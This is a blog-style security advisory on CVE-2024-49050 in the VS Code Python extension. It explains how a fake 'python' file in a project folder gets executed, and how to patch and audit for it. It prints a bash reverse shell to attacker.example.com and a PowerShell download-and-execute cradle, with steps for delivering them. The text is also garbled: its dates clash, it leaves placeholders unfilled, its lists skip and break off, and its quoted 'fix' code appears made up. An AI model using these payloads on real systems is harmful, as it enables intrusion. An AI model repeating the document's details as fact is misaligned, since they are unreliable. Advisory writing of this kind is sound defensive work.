---
A major security flaw, CVE-2024-49050, was found in Microsoft’s Visual Studio Code Python extension. This bug lets attackers run any code on your computer, just by getting you to open a project folder. If you use VS Code with Python, you need to update right away. Here’s an exclusive breakdown of what happened, how the attack works, sample code, and how to stay safe.
What is CVE-2024-49050?
CVE-2024-49050 is a Remote Code Execution (RCE) vulnerability in the official Python extension for Visual Studio Code, which is used by millions of developers. The flaw allows an attacker to execute commands as you, just by convincing you to open or clone a malicious project folder.
Severity: Critical (CVSS Score 9.8)\
Published: April 26, 2024
References
- Microsoft Security Advisory
- GitHub Advisory *(replace with actual once published)*
- BleepingComputer News
How the Attack Works
The VS Code Python extension scans project files to detect the Python environment. It would, by mistake, trust a file in the project folder named python, which could be a script, not the real Python interpreter.
If an attacker puts a file or executable named python in a project directory and you open the folder in VS Code, the extension tries to run this file—without warning. This can:
A new folder with code and a malicious script named python (no extension).
2. The malicious python file:
(it runs a reverse shell, for example)
#!/bin/bash
# Evil python 'interpreter'
bash -i >& /dev/tcp/attacker.example.com/4444 >&1
Or, on Windows, a python.bat could do
@echo off
powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example.com/pwn.ps1';)"
3. Permissions:
On Linux/macOS, the attacker sets executable permissions
chmod +x python
4. Deliver:
Share the folder via GitHub, zip file, or email.
5. Victim:
Here’s a pseudo-flow of what happens
User downloads project folder -> Opens in VS Code ->
Python extension auto-detects interpreter ->
Finds local ./python file -> Executes it (without asking) ->
Malware or attack code runs
Actual Code Snippet From The Fix
Microsoft patched this by making the extension never trust a python executable from the workspace folder. See their commit diff:\
(Replace with an actual link once available.)
// BEFORE
if (fs.existsSync(path.join(workspaceDir, 'python'))) {
interpreterPath = path.join(workspaceDir, 'python');
}
// AFTER
// Ignore python files from workspace for interpreter auto-detect
if (isSystemPath(interpreterCandidatePath)) {
interpreterPath = interpreterCandidatePath;
}
How to Stay Safe
1. Update your Python extension:
Open VS Code, go to Extensions, update Python to latest version (>2024.8.x).
3. Audit for python scripts in code folders
find . -type f -name "python" -exec ls -l {} \;
4. Run VS Code in Restricted Mode for new folders.
5. If you’re an org/institution, consider disabling auto-interpreter detection with these settings.
Summary Table
| Risk | Details |
|------------------------|---------------------------------------------------|
| Extension Affected | Python for Visual Studio Code |
| Vulnerable Versions | Before May 2024 patch |
| Attack Vector | Opening a malicious folder/project |
| Privileges Required | None (runs with your user permissions) |
| Patch Available? | Yes (Update extension NOW) |
Conclusion
CVE-2024-49050 is a scary, “zero-click” attack on the most popular Python plugin for Visual Studio Code. With easy exploit paths and instant code execution, it’s a sharp reminder: Always keep your development tools updated, review folders you open, and think like an attacker.
For more technical info
- Microsoft’s Official CVE page
- VS Code Python Extension Github
Stay sharp and tell a friend!
*Written exclusively for you by AI security researcher. Updated: June 2024*
Timeline
Published on: 11/12/2024 18:15:45 UTC
Last modified on: 01/01/2025 00:15:14 UTC